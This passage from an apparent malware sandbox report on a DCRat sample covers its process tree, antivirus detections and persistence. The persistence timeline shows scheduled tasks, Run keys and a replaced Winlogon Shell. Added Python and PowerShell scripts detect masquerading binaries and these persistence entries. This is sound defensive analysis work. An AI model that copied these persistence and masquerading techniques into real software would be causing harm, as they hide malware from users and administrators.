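    """Return the path when its file name is a system image but it is not under C:\\Windows."""
    p = PureWindowsPath(path_str.strip())
    if p.name.lower() in SYSTEM_IMAGE_NAMES and not is_under(p, WINDOWS_ROOT):
        return p
    return None


def triage(lines):
    """Run both checks over event lines; findings are de-duplicated by (technique, detail)."""
    findings, seen = [], set()

    def add(technique, source, detail):
        if (technique, detail) not in seen:
            seen.add((technique, detail))
            findings.append(Finding(technique, source, detail))

    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        source, event = m.group("source"), m.group("event")
        # (a) Disable or Modify Tools: DisableTaskMgr written, or its policy key touched.
        for value in LOCKDOWN_POLICY_VALUES:
            if re.search(r"\b" + re.escape(value) + r"\b", event, re.IGNORECASE):
                add("T1562.001 Disable or Modify Tools", source, value)
        # (b) Masquerading: a system image name in a non-system directory, whether the
        #     path is the acting process itself or appears inside the event text.
        for text in (source, event):
            for candidate in EXE_PATH_RE.findall(text):
                if masquerading_path(candidate) is not None:
                    add("T1036 Masquerading", source, candidate)
    return findings


# Constructed event lines, modelled on this report's behaviour and Yara sections.
SAMPLE_EVENTS = [
    r"Source: C:\Windows\SysWOW64\reg.exe | Registry value created: DisableTaskMgr 1",
    r"Source: C:\Windows\SysWOW64\reg.exe | Registry key created or modified: "
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr",
    r"Source: Yara match | File source: C:\Users\Default\Documents\sihost.exe, type: DROPPED",
    r"Source: Yara match | File source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED",
    r"Source: C:\Users\Default\Documents\sihost.exe | Queries volume information: "
    r"C:\Users\Default\Documents\sihost.exe VolumeInformation",
    r"Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation",
    # Legitimate WmiPrvSE location (constructed control line): must not fire.
    r"Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Queries volume information: "
    r"C:\Windows\System32\wbem\WmiPrvSE.exe VolumeInformation",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.technique}: {f.detail}  (from {f.source})")
```

On the sample lines this yields three findings: one Disable or Modify Tools hit for DisableTaskMgr and one Masquerading hit each for the sihost.exe copy under C:\Users\Default\Documents and the WmiPrvSE.exe copy under C:\fontdriversavescrt; the control line with the real wbem path produces nothing. The same two checks translate directly to a live host: read HKCU\...\Policies\System\DisableTaskMgr and enumerate files with these image names outside C:\Windows.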
                        MITRE ATT&CK matrix. Cells with a leading number are techniques the report flagged (the number is the report's count badge); unnumbered cells are the matrix's default entries.

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 31 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 37 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 3 Software Packing | NTDS | 121 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | 1 Scheduled Task/Job | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 33 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 31 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                        Behavior Graph (ID 1582599; sample KzLetzDiM8.exe; start date 31/12/2024; architecture WINDOWS; score 100). Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 13 other signatures.

                        Process tree recovered from the graph (dropped files and per-process signatures in brackets):

                        - KzLetzDiM8.exe [drops C:\...\ComComponentDriverInto.exe, PE32]
                          - wscript.exe [Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found]
                            - cmd.exe
                              - ComComponentDriverInto.exe [drops C:\fontdriversavescrt\WmiPrvSE.exe (PE32), C:\Users\user\Desktop\rzpnRRfk.log (PE32), C:\Users\user\Desktop\ppTmQzAj.log (PE32) and 9 other malicious files; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; Creates multiple autostart registry keys; 3 other signatures]
                                - csc.exe [drops C:\Windows\...\SecurityHealthSystray.exe, PE32; Infects executable files (exe, dll, sys, html)]
                                  - conhost.exe
                                  - cvtres.exe
                                - powershell.exe [Loading BitLocker PowerShell Module]
                                  - conhost.exe
                                  - WmiPrvSE.exe
                                - powershell.exe
                                  - conhost.exe
                                - 19 other processes
                                  - conhost.exe (3 shown)
                                  - 18 other processes
                              - reg.exe [Disable Task Manager(disabletaskmgr); Disables the Windows task manager (taskmgr)]
                              - conhost.exe
                        - OXiaaPzsOIsoqrAHYxAVs.exe [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file]
                        - sihost.exe
                        - 4 other processes

                        Source | Detection | Scanner | Label
                        KzLetzDiM8.exe | 51% | Virustotal |
                        KzLetzDiM8.exe | 66% | ReversingLabs | Win32.Trojan.Uztuby
                        KzLetzDiM8.exe | 100% | Joe Sandbox ML |

                        Source | Detection | Scanner | Label
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | 100% | Avira | HEUR/AGEN.1323342
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | 100% | Avira | HEUR/AGEN.1323342
                        C:\Users\Default\Documents\sihost.exe | 100% | Avira | HEUR/AGEN.1323342
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | 100% | Joe Sandbox ML |
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | 100% | Joe Sandbox ML |
                        C:\Users\Default\Documents\sihost.exe | 100% | Joe Sandbox ML |
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | 60% | Virustotal |
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | 60% | Virustotal |
                        C:\Users\Default\Documents\sihost.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                        C:\Users\Default\Documents\sihost.exe | 60% | Virustotal |
                        C:\Users\user\Desktop\AdxdALuR.log | 29% | ReversingLabs | Win32.Trojan.Generic
                        C:\Users\user\Desktop\AdxdALuR.log | 30% | Virustotal |
                        C:\Users\user\Desktop\IGGSkEKz.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\IGGSkEKz.log | 41% | Virustotal |
                        C:\Users\user\Desktop\gLKxhGkC.log | 8% | ReversingLabs |
                        C:\Users\user\Desktop\gLKxhGkC.log | 11% | Virustotal |
                        C:\Users\user\Desktop\izOFSTgA.log | 25% | ReversingLabs |
                        C:\Users\user\Desktop\izOFSTgA.log | 35% | Virustotal |
                        C:\Users\user\Desktop\jwqNoTvv.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\jwqNoTvv.log | 69% | Virustotal |
                        C:\Users\user\Desktop\ppTmQzAj.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\rzpnRRfk.log | 9% | ReversingLabs |
                        C:\fontdriversavescrt\ComComponentDriverInto.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                        C:\fontdriversavescrt\WmiPrvSE.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No contacted domains info
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://aka.ms/pscore68powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ComComponentDriverInto.exe, 00000008.00000002.2014307419.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
https://github.com/Pester/Pester
Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
                                      No contacted IP infos
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1582599
                                      Start date and time:2024-12-31 02:21:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 49s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:86
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Sample name:KzLetzDiM8.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:A554052564261D9D5C7E0CD92514D3A0.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.expl.evad.winEXE@89/107@0/0
                                      EGA Information:
                                      • Successful, ratio: 33.3%
                                      HCA Information:
                                      • Successful, ratio: 55%
                                      • Number of executed functions: 247
                                      • Number of non-executed functions: 98
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, consent.exe, SIHClient.exe, conhost.exe, schtasks.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 500817cm.renyash.top, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target ComComponentDriverInto.exe, PID 6892 because it is empty
                                      • Execution Graph export aborted for target ComComponentDriverInto.exe, PID 8576 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:22:25 | Task Scheduler | Run new task: ComComponentDriverInto path: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
01:22:25 | Task Scheduler | Run new task: ComComponentDriverIntoC path: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
01:22:25 | Task Scheduler | Run new task: WmiPrvSE path: "C:\fontdriversavescrt\WmiPrvSE.exe"
01:22:25 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\fontdriversavescrt\WmiPrvSE.exe"
01:22:28 | Task Scheduler | Run new task: OXiaaPzsOIsoqrAHYxAVs path: "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
01:22:28 | Task Scheduler | Run new task: OXiaaPzsOIsoqrAHYxAVsO path: "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
01:22:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontdriversavescrt\WmiPrvSE.exe"
01:22:30 | Task Scheduler | Run new task: sihost path: "C:\Users\Default User\Documents\sihost.exe"
01:22:30 | Task Scheduler | Run new task: sihosts path: "C:\Users\Default User\Documents\sihost.exe"
01:22:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto "C:\fontdriversavescrt\ComComponentDriverInto.exe"
01:22:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\Default User\Documents\sihost.exe"
01:23:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
01:23:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontdriversavescrt\WmiPrvSE.exe"
01:23:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto "C:\fontdriversavescrt\ComComponentDriverInto.exe"
01:23:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\Default User\Documents\sihost.exe"
01:23:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
01:23:51 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontdriversavescrt\WmiPrvSE.exe"
01:23:59 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto "C:\fontdriversavescrt\ComComponentDriverInto.exe"
01:24:08 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\Default User\Documents\sihost.exe"
01:24:17 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
01:24:33 | Autostart | Run: WinLogon Shell "C:\fontdriversavescrt\WmiPrvSE.exe"
20:22:32 | API Interceptor | 424x Sleep call for process: powershell.exe modified
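The timeline above shows the full DCRat persistence set: each dropped binary is registered under two scheduled-task names, under the Run key in both registry views for HKCU and HKLM, and the Winlogon Shell value is replaced with the fake WmiPrvSE.exe. The script below is an added example, not Joe Sandbox output and not the sample's code: it walks those same locations on a live host, flags images that carry a Windows system binary name but sit outside %SystemRoot% (WmiPrvSE.exe, sihost.exe) or that live in an unusual directory (C:\Recovery, C:\fontdriversavescrt, the Default user profile), and then hashes what it flagged so that one payload registered from several paths stands out. The system-binary name list, the set of "normal" top-level directories and the finding format are this example's assumptions; run it in an elevated Windows PowerShell 5.1 session on Windows 8/Server 2012 or later (Get-ScheduledTask).

```powershell
# Added example (not part of the report): hunt the persistence locations used
# by this sample and flag images impersonating system binaries.
# Assumptions: $SystemNames and $NormalTopDirs are chosen for this example.

$SystemNames   = @('wmiprvse.exe', 'sihost.exe', 'svchost.exe', 'csrss.exe',
                   'lsass.exe', 'winlogon.exe', 'dllhost.exe', 'explorer.exe')
$NormalTopDirs = @('windows', 'program files', 'program files (x86)', 'programdata', 'users')
$Findings      = New-Object System.Collections.Generic.List[object]

function Get-ImagePath {
    # Reduce a command line to its image path: "C:\d\x.exe" /a  ->  C:\d\x.exe
    param([string]$Command)
    if (-not $Command) { return $null }
    $Command = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($Command -match '^"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^(.+?\.(exe|cmd|bat|vbs|js|ps1))(\s|$)') { return $Matches[1] }  # unquoted path with spaces
    return ($Command -split '\s+')[0]
}

function Test-SuspiciousImage {
    # Returns a reason string when the image path looks wrong, otherwise $null
    param([string]$Path)
    if (-not $Path) { return $null }
    $name   = [IO.Path]::GetFileName($Path).ToLowerInvariant()
    $winDir = $env:SystemRoot.TrimEnd('\') + '\'
    $inWin  = $Path.StartsWith($winDir, [StringComparison]::OrdinalIgnoreCase)
    if ($SystemNames -contains $name -and -not $inWin) { return 'system binary name outside %SystemRoot%' }
    if ($Path -match '^[A-Za-z]:\\Users\\Default( User)?\\') { return 'image inside the Default user profile' }
    $top = ($Path -split '\\')[1]
    if ($Path -match '^[A-Za-z]:\\' -and $NormalTopDirs -notcontains $top.ToLowerInvariant()) {
        return "image in non-standard top-level directory '$top'"   # e.g. C:\Recovery, C:\fontdriversavescrt
    }
    return $null
}

function Add-Finding([string]$Source, [string]$Image, [string]$Reason) {
    $Findings.Add([pscustomobject]@{ Source = $Source; Image = $Image; Reason = $Reason })
}

# 1. Run keys. HKLM\Software is view-redirected, so the 32-bit view under
#    WOW6432Node is checked too (the report's HKLM vs HKLM64 rows are the two views).
$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($key in $RunKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }           # PSPath, PSProvider, ... metadata
        $img = Get-ImagePath $prop.Value
        $why = Test-SuspiciousImage $img
        if ($why) { Add-Finding "$key\$($prop.Name)" $img $why }
    }
}

# 2. Winlogon Shell: anything other than explorer.exe replaces the user's shell
foreach ($hive in 'HKLM', 'HKCU') {
    $key   = "${hive}:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
    $shell = (Get-ItemProperty -Path $key -Name Shell -ErrorAction SilentlyContinue).Shell
    if ($shell) {
        foreach ($entry in ($shell -split ',')) {            # the value is a comma-separated list
            $img = Get-ImagePath $entry
            if ($img -and $img -ne 'explorer.exe') { Add-Finding "$key\Shell" $img 'Winlogon Shell is not explorer.exe' }
        }
    }
}

# 3. Scheduled task actions (the sample registers each drop under two task names)
foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    foreach ($action in $task.Actions) {
        $img = Get-ImagePath $action.Execute                 # $null for COM-handler actions
        $why = Test-SuspiciousImage $img
        if ($why) { Add-Finding "Task $($task.TaskPath)$($task.TaskName)" $img $why }
    }
}

# 4. Hash the flagged images: one hash behind several paths is the pattern in
#    the dropped-files section of this report.
foreach ($f in $Findings) {
    $hash = if (Test-Path -LiteralPath $f.Image -PathType Leaf) {
        (Get-FileHash -LiteralPath $f.Image -Algorithm SHA256).Hash
    } else { '<missing>' }
    $f | Add-Member -NotePropertyName SHA256 -NotePropertyValue $hash
}
$Findings | Sort-Object SHA256, Source | Format-Table -AutoSize
$Findings | Where-Object { $_.SHA256 -ne '<missing>' } | Group-Object SHA256 |
    Where-Object { $_.Count -gt 1 } |
    ForEach-Object { "{0} persistence entries share {1}: {2}" -f $_.Count, $_.Name,
                     (($_.Group.Image | Sort-Object -Unique) -join '; ') }
```

The check is deliberately on the path, not the process name: the cookbook comments above show the sandbox excluding WmiPrvSE.exe from analysis by name, which is exactly the blind spot a fake C:\fontdriversavescrt\WmiPrvSE.exe relies on. Tasks whose actions have already been removed still leave a finding with SHA256 "<missing>", which is worth keeping as a trace of cleanup.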
No context
Match: C:\Users\user\Desktop\AdxdALuR.log
Associated Sample Name / URL | Detection | Threat Name
f3I38kv.exe | malicious | DCRat, PureLog Stealer, zgRAT
ZZ2sTsJFrt.exe | malicious | DCRat, PureLog Stealer, zgRAT
Z4D3XAZ2jB.exe | malicious | DCRat, PureLog Stealer, zgRAT
XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT
3e88PGFfkf.exe | malicious | DCRat
9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT
8k1e14tjcx.exe | malicious | DCRat, PureLog Stealer, zgRAT
